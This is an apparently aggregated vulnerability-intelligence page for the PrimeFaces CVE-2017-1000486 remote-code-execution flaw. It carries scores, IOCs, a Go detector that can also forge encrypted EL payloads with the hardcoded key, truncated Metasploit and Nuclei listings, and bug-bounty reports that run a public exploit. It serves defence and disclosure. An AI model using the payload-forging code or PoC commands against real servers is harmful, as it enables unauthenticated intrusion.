CVE-2017-1000486
Published 2018-01-03
CVE-2017-1000486: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
Priority: P1 · 95 · critical · CVSS 3.1: 9.8
Vector: AV:N AC:L PR:N UI:N S:U C:H I:H A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-07-10
Exploited in the wild
EPSS: 94.10% (99.8th percentile)
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| primetek | primefaces | 4.0 – 4.0.24 | — |
| primetek | primefaces | >= 5.0 < 5.2.21 | 5.2.21 |
| primetek | primefaces | >= 5.3 < 5.3.8 | 5.3.8 |
Detection & IOCs (extracted from sources)
- path: /javax.faces.resource/dynamiccontent.properties.xhtml
- query: pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D
- response header: Mogwailabs: CHECKCHECK
- bytes: DES salt a9 9b c8 32 56 34 e3 03, iterationCount 19
- The public exploits encrypt the EL payload carried in the pfdrid parameter with DES, using the hardcoded password 'primefaces', the fixed salt (0xa9,0x9b,0xc8,0x32,0x56,0x34,0xe3,0x03) and an iteration count of 19. Because every affected deployment shares these parameters, no oracle is needed: the attacker encrypts the payload directly, and a defender can decrypt captured pfdrid values with the same parameters to confirm malicious content.
- The Nuclei template confirms EL injection by looking for the custom response header 'Mogwailabs: CHECKCHECK'; defenders can alert on this header appearing in HTTP responses.
- The exploit injects Java EL expressions that use javax.script.ScriptEngineManager to obtain a JavaScript engine and run OS commands through java.lang.ProcessBuilder. These strings sit inside the encrypted pfdrid value, so they are only visible after decryption; match on decrypted pfdrid values from JSF resource requests rather than on raw request logs.
- FIN13 (Elephant Beetle) has been observed exploiting CVE-2017-1000486 for initial access; correlate Primefaces exploit attempts with subsequent web shell deployment (JspSpy, reGeorg, MiniWebCmdShell) and xp_cmdshell usage.
- The Metasploit check method injects an EL expression that sets a custom response header 'primesecretchk' to a random value; unexpected custom headers in responses from JSF applications are a sign of active probing.
- Only Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are affected. The weak crypto stems from DES with a default hardcoded password ('primefaces') and a fixed salt; upgrading to 5.2.21, 5.3.8 or 6.0 (or later) fixes the issue.
- The Metasploit module's default RPORT is 80; deployments on non-standard ports need detection rules keyed on the vulnerable URI path rather than on a port.
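The following is an added example in Go, not code from PrimeFaces, the Metasploit module, the Nuclei template or the pimps PoC. It does what the IOC bullets above describe: derives the key and IV from the published password, salt and iteration count, forges and decrypts pfdrid values, and flags EL injection markers in requests to the vulnerable path. It assumes the scheme is Java's PBEWithMD5AndDES (PKCS#5 v1.5 PBKDF1 with MD5, DES-CBC, PKCS#5 padding), which is what a password/salt/iterationCount triple with an 8-byte salt implies; the request samples other than the quoted Nuclei pfdrid, the token list and all function names are constructed for this example.

```go
package main

// Added example, not PrimeFaces, Metasploit, Nuclei or PoC code. Assumes Java's PBEWithMD5AndDES
// scheme (PKCS#5 v1.5 PBKDF1-MD5, DES-CBC, PKCS#5 padding); all sample requests except the quoted IOC are constructed.
import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/md5"
	"encoding/base64"
	"fmt"
	"net/url"
	"strings"
)

// Defaults quoted in the IOC section (PrimeFaces 5.x before 5.2.21 / 5.3.8).
const (
	pbePassword   = "primefaces"
	pbeIterations = 19
	vulnPath      = "/javax.faces.resource/dynamiccontent.properties.xhtml"
)

var pbeSalt = []byte{0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x34, 0xe3, 0x03}
var suspiciousTokens = []string{"ScriptEngineManager", "ProcessBuilder", "Runtime", "setResponseHeader"} // injected-EL markers

// pbeKeyIV is PBKDF1-MD5: T1 = MD5(password||salt), Ti = MD5(Ti-1); DES key = bytes 0-7, CBC IV = bytes 8-15.
func pbeKeyIV(password string, salt []byte, iterations int) (key, iv []byte) {
	sum := md5.Sum(append([]byte(password), salt...))
	for i := 1; i < iterations; i++ {
		sum = md5.Sum(sum[:])
	}
	return sum[:8], sum[8:16]
}

// pbeEncrypt forges a pfdrid the way the public PoCs do: no secret is involved, which is the bug.
func pbeEncrypt(plaintext string) string {
	key, iv := pbeKeyIV(pbePassword, pbeSalt, pbeIterations)
	block, _ := des.NewCipher(key) // key is always 8 bytes here
	pad := des.BlockSize - len(plaintext)%des.BlockSize
	padded := append([]byte(plaintext), bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(out)
}

// pbeDecrypt reverses pbeEncrypt and rejects truncated or tampered values instead of returning garbage.
func pbeDecrypt(pfdrid string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(pfdrid)
	if err != nil || len(raw) == 0 || len(raw)%des.BlockSize != 0 {
		return "", fmt.Errorf("pfdrid is not base64 of whole DES blocks (%d bytes, %v)", len(raw), err)
	}
	key, iv := pbeKeyIV(pbePassword, pbeSalt, pbeIterations)
	block, _ := des.NewCipher(key)
	plain := make([]byte, len(raw))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, raw)
	n := int(plain[len(plain)-1])
	if n < 1 || n > des.BlockSize || !bytes.Equal(plain[len(plain)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", fmt.Errorf("bad PKCS#5 padding: not made with the default key, or tampered")
	}
	return string(plain[:len(plain)-n]), nil
}

type Finding struct {
	Target, Pfdrid, Decrypted string
	Suspicious                []string // injection tokens seen in the plaintext
	Err                       error    // pfdrid did not decrypt: a probe with another key, or fuzzing
}

// inspectRequest takes a request target (path + query); ok is false unless it carries a pfdrid to the vulnerable endpoint.
func inspectRequest(target string) (f Finding, ok bool) {
	u, err := url.Parse(target)
	if err != nil || !strings.HasSuffix(u.Path, vulnPath) {
		return f, false
	}
	pfdrid := strings.ReplaceAll(u.Query().Get("pfdrid"), " ", "+") // Query() turns an unescaped '+' into ' '
	if pfdrid == "" {
		return f, false
	}
	f = Finding{Target: target, Pfdrid: pfdrid}
	f.Decrypted, f.Err = pbeDecrypt(pfdrid) // undecryptable values are still reported: they are still probes
	for _, tok := range suspiciousTokens {
		if strings.Contains(f.Decrypted, tok) {
			f.Suspicious = append(f.Suspicious, tok)
		}
	}
	return f, true
}

func main() {
	// Constructed samples: benign page load, EL payload in the style of the public exploits,
	// truncated pfdrid, and the exact pfdrid quoted in the IOC section above.
	el := `${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.ProcessBuilder")}`
	q := "/showcase" + vulnPath + "?pfdrt=sc&ln=primefaces&pfdrid="
	for _, t := range []string{"/showcase/index.xhtml", q + url.QueryEscape(pbeEncrypt(el)), q + "AAAAAAAAAA%3D%3D",
		q + "uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"} {
		f, ok := inspectRequest(t)
		fmt.Printf("probe=%v suspicious=%v err=%v\n  %q\n", ok, f.Suspicious, f.Err, f.Decrypted)
	}
}
```

Run it with `go run`. The last sample is the pfdrid from the Nuclei template, so the printed plaintext should be the EL expression that template sends (the one that sets the Mogwailabs header, per the IOC notes). Because the key is fixed, a detector can match on the decrypted expression instead of the opaque parameter, and a pfdrid that does not decrypt is itself a signal: legitimate PrimeFaces clients only send values the server itself encrypted.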
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- VulnCheck: 9.8 CRITICAL
- CISA: 9.8 CRITICAL
CISA
Primetek Primefaces Remote Code Execution Vulnerability
cisa·2022-01-10·CVSS 9.8
CVE-2017-1000486 [CRITICAL] CWE-326 Primetek Primefaces Remote Code Execution Vulnerability
Vulnerability: Primetek Primefaces Remote Code Execution Vulnerability
Affected: Primetek Primefaces Application
Primetek Primefaces is vulnerable to a weak encryption flaw resulting in remote code execution
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
Remediation Due Date: 2022-07-10
OSV
Inadequate Encryption Strength
osv·2021-06-03
CVE-2017-1000486 [CRITICAL] Inadequate Encryption Strength
Inadequate Encryption Strength
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
GHSA
Inadequate Encryption Strength
ghsa·2021-06-03
CVE-2017-1000486 [CRITICAL] CWE-326 Inadequate Encryption Strength
Inadequate Encryption Strength
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
VulnCheck
Primetek Primefaces Remote Code Execution Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-1000486 [CRITICAL] CWE-326 Primetek Primefaces Remote Code Execution Vulnerability
Primetek Primefaces Remote Code Execution Vulnerability
Primetek Primefaces is vulnerable to a weak encryption flaw resulting in remote code execution
Affected: Primetek Primefaces Application
Required Action: Apply updates per vendor instructions.
Exploitation References:
- https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-28&host_type=src&vulnerability=cve-2017-1000486
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-29&host_type=src&vulnerability=cve-2017-1000486
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day
No detection rules found.
Exploit-DB
Primefaces 5.x - Remote Code Execution (Metasploit)
exploitdb·2018-01-18·CVSS 9.8
CVE-2017-1000486 [CRITICAL] Primefaces 5.x - Remote Code Execution (Metasploit)
Primefaces 5.x - Remote Code Execution (Metasploit)
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# The text between "class MetasploitModule" and 'Name' was lost in extraction (the "<" was read
# as an HTML tag); the standard module skeleton is restored here. The listing is cut off by the page.
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
      'Description'    => %q{
        This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
        Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
      },
      'Author'         => [ 'Bjoern Schuette' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', 'CVE-2017-1000486'],
          ['URL', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'],
          ['URL', 'https://cryptosense
```
Nuclei
Primetek Primefaces 5.x - Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-1000486 [CRITICAL] Primetek Primefaces 5.x - Remote Code Execution
Primetek Primefaces 5.x - Remote Code Execution
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
Template (cut off by the page after the third reference):

```yaml
id: CVE-2017-1000486
info:
  name: Primetek Primefaces 5.x - Remote Code Execution
  author: Moritz Nentwig
  severity: critical
  description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.
  reference:
    - https://github.com/mogwailabs/CVE-2017-1000486
    - https://github.com/pimps/CVE-2017-1000486
    - https://blog.mindedsecurity.com/2016/02/rce-in-
```
Metasploit
Primefaces Remote Code Execution Exploit
metasploit
Primefaces Remote Code Execution Exploit
Primefaces Remote Code Execution Exploit
This module exploits a Java Expression Language remote code execution flaw in the Primefaces JSF framework. Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt. Tested against Docker image with Tomcat 7.0 with the Primefaces 5.2 showcase application. See documentation for working payloads.
HackerOne
RCE in ██████ subdomain via CVE-2017-1000486
hackerone·2021-04-08·CVSS 9.8
CVE-2017-1000486 [CRITICAL] RCE in ██████ subdomain via CVE-2017-1000486
RCE in ██████ subdomain via CVE-2017-1000486
**Summary:**
The application at ████████/ftn-Website/ uses primefaces 5.3 but not 5.3.8, making it vulnerable to unauthenticated RCE CVE-2017-1000486.
## Step-by-step Reproduction Instructions
1. Get the publicly available POC for this vulnerability here: https://github.com/pimps/CVE-2017-1000486
2. Execute: `python primefaces.py ███/ftn-Website/ -c id`
3. Success: `uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=system_u:system_r:tomcat_t:s0`
## Product, Version, and Configuration (If applicable)
primefaces 5.3
## Suggested Mitigation/Remediation Actions
Update primefaces.
## Impact
An unauthenticated, 3rd-party attacker or adversary can execute remote code on restsvr1.ftn.research.usafa.edu as the unix `tomcat` user. Note that t
HackerOne
RCE (Remote code execution) in one of DoD's websites
hackerone·2020-07-30·CVSS 9.8
CVE-2017-1000486 [CRITICAL] RCE (Remote code execution) in one of DoD's websites
RCE (Remote code execution) in one of DoD's websites
**Summary:**
The targeted website is vulnerable to CVE-2017-1000486; only the command (whoami) was run, to prove that the RCE exists, and it ran successfully on the target.
**Description:**
The target uses a vulnerable version of primefaces : Primetek Primefaces 5.x, that is vulnerable to a weak encryption flaw resulting in remote code execution
## Impact
Critical
## Step-by-step Reproduction Instructions
Using the following exploit : https://github.com/pimps/CVE-2017-1000486
1. `python primefaces.py ████████/`
## Product, Version, and Configuration (If applicable)
Primefaces 5.3.6
## Suggested Mitigation/Remediation Actions
Primefaces has to be updated to a newer version
## Impact
An attacker could execute remote codes on the target s
Threat Intel
FIN13 (FIN13, Elephant Beetle)
threat_intel·CVSS 10.0
[CRITICAL] FIN13 (FIN13, Elephant Beetle)
# Threat Actor Profile: FIN13
ATT&CK ID: G1016
Also known as: FIN13, Elephant Beetle
## Overview
FIN13 is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. FIN13 achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
## Techniques (TTPs)
### Reconnaissance
- T1589 Gather Victim Identity Information
Usage: FIN13 has researched employees to target for social engineering attacks.(Citation: Mandiant FIN13 Aug 2022)
- T1590.004 Network Topology
Usage: FIN13 has searched for infrastructure that can provide remote access to an environment for targ
References
- http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://cryptosense.com/weak-encryption-flaw-in-primefaces/
- https://github.com/primefaces/primefaces/issues/1152
- https://www.exploit-db.com/exploits/43733/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-1000486
Timeline
- 2018-01-03: Published
- 2022-01-10: Added to CISA KEV
- Exploited in the wild